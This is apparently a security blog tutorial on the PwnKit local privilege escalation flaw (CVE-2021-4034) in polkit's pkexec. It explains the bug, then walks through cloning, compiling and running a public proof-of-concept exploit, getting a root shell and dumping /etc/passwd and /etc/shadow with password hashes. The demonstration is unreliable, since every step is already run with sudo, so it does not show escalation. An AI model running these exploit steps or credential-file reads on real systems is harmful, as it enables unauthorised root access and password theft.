PwnKit: Local Privilege Escalation Vulnerability CVE-2021-4034

 

 

Define Polkit pkexec for Linux

Polkit, previously known as PolicyKit, polkit is a system service installed by default on many Linux distributions. It’s used by systemd, so any Linux distribution that uses systemd also uses polkit. The vulnerability resides within polkit's pkexec, a SUID-root program that's installed by default on all major Linux distributions. Designated CVE-2021-4034, the vulnerability has been given a CVSS score of 7.8.


OR


Polkit is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged processes. It is also possible to use polkit to execute commands with elevated privileges using the command pkexec followed by the command intended to be executed (with root permission). The vulnerability found in pkexec allows an unprivileged local attacker to escalate privileges, bypassing any authentication and policies due to incorrect handling of the process’s argument vector.

Bharat Jogi, director of vulnerability and threat research at Qualys

CVE-2021-4034 (PWNKIT)

A memory corruption vulnerability in polkit's pkexec, which allows any unprivileged user to gain full root privileges on a vulnerable system using default polkit configuration

Potential Impact of PwnKit Vulnerability

Successful exploitation of this vulnerability allows any unprivileged user to gain root privileges on the vulnerable host. Qualys security researchers have been able to independently verify the vulnerability, develop an exploit, and obtain full root privileges on default installations of Ubuntu, Debian, Fedora, and CentOS. Other Linux distributions are likely vulnerable and probably exploitable. This vulnerability has been hiding in plain sight for 12+ years and affects all versions of pkexec since its first version in May 2009 (commit c8c3d83,  “Add a pkexec(1) command”).


 

Technical Details of PwnKit Vulnerability

What follows is an explanation of how the PwnKit vulnerability works.

The beginning of pkexec’s main() function processes the command-line arguments (lines 534-568), and searches for the program to be executed, if its path is not absolute, in the directories of the PATH environment variable (lines 610-640):

 

 

------------------------------------------------------------------------


435 main (int argc, char *argv[])
436 {
...
534   for (n = 1; n < (guint) argc; n++)
535     {
...
568     }
...
610   path = g_strdup (argv[n]);
...
629   if (path[0] != '/')
630     {
...
632       s = g_find_program_in_path (path);
...
639       argv[n] = path = s;
640     }


------------------------------------------------------------------------

 

Unfortunately, if the number of command-line arguments argc is 0 – which means if the argument list argv that we pass to execve() is empty, i.e. {NULL} – then argv[0] is NULL. This is the argument list’s terminator. Therefore:

•      at line 534, the integer n is permanently set to 1;
•      at line 610, the pointer path is read out-of-bounds from argv[1];
•      at line 639, the pointer s is written out-of-bounds to argv[1].

But what exactly is read from and written to this out-of-bounds argv[1]?

To answer this question, we must digress briefly. When we execve() a new program, the kernel copies our argument, environment strings, and pointers (argv and envp) to the end of the new program’s stack; for example:
 

 

|---------+---------+-----+------------|---------+---------+-----+------------| 
| argv[0] | argv[1] | ... | argv[argc] | envp[0] | envp[1] | ... | envp[envc] | 
|----|----+----|----+-----+-----|------|----|----+----|----+-----+-----|------| 
V         V                V           V         V                V 
"program" "-option"           NULL      "value" "PATH=name"          NULL 

 

Clearly, because the argv and envp pointers are contiguous in memory, if argc is 0, then the out-of-bounds argv[1] is actually envp[0], the pointer to our first environment variable, “value”. Consequently:

 

• At line 610, the path of the program to be executed is read out-of-bounds from argv[1] (i.e. envp[0]), and points to “value”;
   
• At line 632, this path “value” is passed to g_find_program_in_path()  (because “value” does not start with a slash, at line 629);
   
• Then, g_find_program_in_path() searches for an executable file named “value” in the directories of our PATH environment variable;
   
• If such an executable file is found, its full path is returned to pkexec’s main() function (at line 632);
   
• Finally, at line 639, this full path is written out-of-bounds to argv[1] (i.e. envp[0]), thus overwriting our first environment variable.

So, stated more precisely:

 

• If our PATH environment variable is “PATH=name”, and if the directory “name” exists (in the current working directory) and contains an  executable file named “value”, then a pointer to the string  “name/value” is written out-of-bounds to envp[0];

 

OR

 

• If our PATH is “PATH=name=.”, and if the directory “name=.” exists and contains an executable file named “value”, then a pointer to the  string “name=./value” is written out-of-bounds to envp[0].

• In other words, this out-of-bounds write allows us to re-introduce an “unsecure” environment variable (for example, LD_PRELOAD) into pkexec’s environment. These “unsecure” variables are normally removed (by ld.so) from the environment of SUID programs before the main() function is called. We will exploit this powerful primitive in the following section.

• Last-minute note: polkit also supports non-Linux operating systems such as Solaris and *BSD, but we have not investigated their exploitability. However, we note that OpenBSD is not exploitable, because its kernel refuses to execve() a program if argc is 0.

PKEXEC Status

Before exploiting we will polkit status if status is inactive (disabl) so you can active this service and then exploit it. Ok!!

 

┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp/CVE-2021-4034]
└─$ service polkit status   
○ polkit.service - Authorization Manager
     Loaded: loaded (/lib/systemd/system/polkit.service; static)
     Active: inactive (dead) since Sat 2022-01-29 20:51:12 IST; 4s ago
       Docs: man:polkit(8)
    Process: 592 ExecStart=/usr/libexec/polkitd --no-debug (code=killed, signal=TERM)
   Main PID: 592 (code=killed, signal=TERM)
        CPU: 464ms

Warning: some journal files were not opened due to insufficient permissions.
┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp/CVE-2021-4034]
└─$                                                                                                                                                                                     3 ⨯
┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp/CVE-2021-4034]
└─$ #www.kumaratuljaiswal.in                                                                                                                                                            3 ⨯
┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp/CVE-2021-4034]
└─$ 

┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp/CVE-2021-4034]
└─$ service polkit start 
                                                                                                                                                               5 ⨯
┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp/CVE-2021-4034]
└─$ service polkit status                                                      
● polkit.service - Authorization Manager
     Loaded: loaded (/lib/systemd/system/polkit.service; static)
     Active: active (running) since Sat 2022-01-29 20:51:47 IST; 2min 48s ago
       Docs: man:polkit(8)
   Main PID: 39703 (polkitd)
      Tasks: 3 (limit: 4366)
     Memory: 7.3M
        CPU: 1.412s
     CGroup: /system.slice/polkit.service
             └─39703 /usr/libexec/polkitd --no-debug
┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp/CVE-2021-4034]
└─$ 

Now we clone a github repo and exploitation code (c languag) too, so lets start

git clone https://github.com/arthepsy/CVE-2021-4034.git

cd CVE-2021-4034

ls

gcc cve-202-4034-poc.c -o poc-hackingtruth.org  (compile)

./poc-hackingtruth.org

# as you can see that below the output even you can say that after exploitation you can do everything without password.

 

┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp]
└─$ sudo git clone https://github.com/arthepsy/CVE-2021-4034.git
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 18, done.
remote: Counting objects: 100% (18/18), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 18 (delta 4), reused 7 (delta 0), pack-reused 0
Receiving objects: 100% (18/18), 4.28 KiB | 115.00 KiB/s, done.
Resolving deltas: 100% (4/4), done.
┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp]
└─$ cd CVE-2021-4034   
┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp/CVE-2021-4034]
└─$ ls   
cve-2021-4034-poc.c  README.md
┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp/CVE-2021-4034]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp/CVE-2021-4034]
└─$ ls              
cve-2021-4034-poc.c  README.md
┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp/CVE-2021-4034]
└─$ sudo gcc cve-2021-4034-poc.c -o poc-hackingtruth.org        
┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp/CVE-2021-4034]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp/CVE-2021-4034]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[/tmp/CVE-2021-4034]
└─$ sudo ./poc-hackingtruth.org                         
# 
# whoami
root
# pwd
/tmp/CVE-2021-4034
#    
# cat /etc/passwd
root:x:0:1006:root:/root:/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:101:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
mysql:x:104:110:MySQL Server,,,:/nonexistent:/bin/false
tss:x:105:111:TPM software stack,,,:/var/lib/tpm:/bin/false
strongswan:x:106:65534::/var/lib/strongswan:/usr/sbin/nologin
ntp:x:107:112::/nonexistent:/usr/sbin/nologin
messagebus:x:108:113::/nonexistent:/usr/sbin/nologin
redsocks:x:109:114::/var/run/redsocks:/usr/sbin/nologin
rwhod:x:110:65534::/var/spool/rwho:/usr/sbin/nologin
iodine:x:111:65534::/run/iodine:/usr/sbin/nologin
miredo:x:112:65534::/var/run/miredo:/usr/sbin/nologin
usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
tcpdump:x:114:119::/nonexistent:/usr/sbin/nologin
rtkit:x:115:120:RealtimeKit,,,:/proc:/usr/sbin/nologin
_rpc:x:116:65534::/run/rpcbind:/usr/sbin/nologin
Debian-snmp:x:117:122::/var/lib/snmp:/bin/false
statd:x:118:65534::/var/lib/nfs:/usr/sbin/nologin
postgres:x:119:124:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
stunnel4:x:120:126::/var/run/stunnel4:/usr/sbin/nologin
sshd:x:121:65534::/run/sshd:/usr/sbin/nologin
sslh:x:122:127::/nonexistent:/usr/sbin/nologin
avahi:x:123:128:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
nm-openvpn:x:124:129:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
nm-openconnect:x:125:130:NetworkManager OpenConnect plugin,,,:/var/lib/NetworkManager:/usr/sbin/nologin
pulse:x:126:132:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
saned:x:127:134::/var/lib/saned:/usr/sbin/nologin
inetsim:x:128:136::/var/lib/inetsim:/usr/sbin/nologin
colord:x:129:137:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:130:138::/var/lib/geoclue:/usr/sbin/nologin
lightdm:x:131:139:Light Display Manager:/var/lib/lightdm:/bin/false
king-phisher:x:132:140::/var/lib/king-phisher:/usr/sbin/nologin
hackerboy:x:1000:0:hackerboy,,,:/home/hackerboy:/bin/zsh
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
varnish:x:998:1001::/home/varnish:/bin/sh
_dnscrypt-proxy:x:133:65534::/run/dnscrypt-proxy:/usr/sbin/nologin
debian-tor:x:134:142::/var/lib/tor:/bin/false
Debian-exim:x:135:143::/var/spool/exim4:/usr/sbin/nologin
redis:x:136:144::/var/lib/redis:/usr/sbin/nologin
_gvm:x:137:145::/var/lib/openvas:/usr/sbin/nologin
ak:x:1002:1003::/home/ak:/bin/sh/nologin
speech-dispatcher:x:138:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
hackingtruth.in:x:1003:1004::/home/hackingtruth.in:/usr/bin/zsh
bind:x:139:147::/var/cache/bind:/usr/sbin/nologin
arpwatch:x:140:149:ARP Watcher,,,:/var/lib/arpwatch:/bin/sh
arpalert:x:141:150:ARP Alerter,,,:/var/lib/arpalert:/bin/sh
hackingtruth:x:1004:1007:Hacking Truth,,,:/home/hackingtruth:/bin/bash
# 
# cat /etc/shadow
root:!:18580:0:99999:7:::
daemon:*:18580:0:99999:7:::
bin:*:18580:0:99999:7:::
sys:*:18580:0:99999:7:::
sync:*:18580:0:99999:7:::
games:*:18580:0:99999:7:::
man:*:18580:0:99999:7:::
lp:*:18580:0:99999:7:::
mail:*:18580:0:99999:7:::
news:*:18580:0:99999:7:::
uucp:*:18580:0:99999:7:::
proxy:*:18580:0:99999:7:::
www-data:*:18580:0:99999:7:::
backup:*:18580:0:99999:7:::
list:*:18580:0:99999:7:::
irc:*:18580:0:99999:7:::
gnats:*:18580:0:99999:7:::
nobody:*:18580:0:99999:7:::
_apt:*:18580:0:99999:7:::
systemd-timesync:*:18580:0:99999:7:::
systemd-network:*:18580:0:99999:7:::
systemd-resolve:*:18580:0:99999:7:::
mysql:!:18580:0:99999:7:::
tss:*:18580:0:99999:7:::
strongswan:*:18580:0:99999:7:::
ntp:*:18580:0:99999:7:::
messagebus:*:18580:0:99999:7:::
redsocks:!:18580:0:99999:7:::
rwhod:*:18580:0:99999:7:::
iodine:*:18580:0:99999:7:::
miredo:*:18580:0:99999:7:::
usbmux:*:18580:0:99999:7:::
tcpdump:*:18580:0:99999:7:::
rtkit:*:18580:0:99999:7:::
_rpc:*:18580:0:99999:7:::
Debian-snmp:!:18580:0:99999:7:::
statd:*:18580:0:99999:7:::
postgres:*:18580:0:99999:7:::
stunnel4:!:18580:0:99999:7:::
sshd:*:18580:0:99999:7:::
sslh:!:18580:0:99999:7:::
avahi:*:18580:0:99999:7:::
nm-openvpn:*:18580:0:99999:7:::
nm-openconnect:*:18580:0:99999:7:::
pulse:*:18580:0:99999:7:::
saned:*:18580:0:99999:7:::
inetsim:*:18580:0:99999:7:::
colord:*:18580:0:99999:7:::
geoclue:*:18580:0:99999:7:::
lightdm:*:18580:0:99999:7:::
king-phisher:*:18580:0:99999:7:::
hackerboy:$6$V4AmnlsIDSMADZL8$VobM/vkZr.CJaNQVTdyG4mucSuFGxKWRvp6WNGcVzP9LhM1E8POaXgJtNaA6gVQHHw2U9kiWOhG.RULLTOnlP.:18580:0:99999:7:::
systemd-coredump:!!:18580::::::
varnish:!:18584::::::
_dnscrypt-proxy:*:18585:0:99999:7:::
debian-tor:*:18585:0:99999:7:::
Debian-exim:!:18585:0:99999:7:::
redis:*:18591:0:99999:7:::
_gvm:*:18591:0:99999:7:::
atul:$6$.vXPlfqF.o9ndfs.$/ntvls/aXetm0A9t195IMofFM7.JbpeP1ap1NCdLc.SioqU.IRHQJBfpq9Uhz3H24r04I5qKiSR3K1c.5a9YW/:18606:0:99999:7:::
ak:!:18655:0:99999:7:::
speech-dispatcher:!:18717:0:99999:7:::
hackingtruth.in:$y$j9T$OVuph05EYKkkAVp1H/2KX1$C4BuqeXw8qX7aHnjC04B9okGLEnyB3nwE1NzgrYhZI5:18774:0:99999:7:::
bind:*:18969:0:99999:7:::
arpwatch:!:19015:0:99999:7:::
arpalert:!:19018:0:99999:7:::
hackingtruth:$5$uhQ4C3rvltiS0QWL$kp/DMGNbaG62u0k9zTPegWqhEy5/ZsxKsZyn9hrAkq/:19019:0:99999:7:::
# 

 

 

# whoami
root
# 
# apt-get install libglib2.0-dev
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Suggested packages:
  libgirepository1.0-dev libglib2.0-doc
The following NEW packages will be installed:
  libglib2.0-dev
0 upgraded, 1 newly installed, 0 to remove and 903 not upgraded.
Need to get 0 B/1601 kB of archives.
After this operation, 10.2 MB of additional disk space will be used.
debconf: unable to initialize frontend: Dialog
debconf: (TERM is not set, so the dialog frontend is not usable.)
debconf: falling back to frontend: Readline
Selecting previously unselected package libglib2.0-dev:amd64.
(Reading database ... 430513 files and directories currently installed.)
Preparing to unpack .../libglib2.0-dev_2.70.2-1_amd64.deb ...
Unpacking libglib2.0-dev:amd64 (2.70.2-1) ...
Setting up libglib2.0-dev:amd64 (2.70.2-1) ...
Processing triggers for libglib2.0-0:amd64 (2.70.2-1) ...
GLib: Cannot convert message: Conversion from character set “UTF-8” to “PWNKIT” is not supported
Usage:
  gdbus call [OPTION…]

Invoke a method on a remote object.

Connection Endpoint Options:
  -y, --system          Connect to the system bus
  -e, --session         Connect to the session bus
  -a, --address         Connect to given D-Bus address

Application Options:
  -d, --dest            Destination name to invoke method on
  -o, --object-path     Object path to invoke method on
  -m, --method          Method and interface name
  -t, --timeout         Timeout in seconds

# www.hackingtruth.org  

 

Thanks qualys for your support :-)

 

I hope you liked this post, then you should not forget to share this post at all.
Thank you so much :-)

 

Disclaimer

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.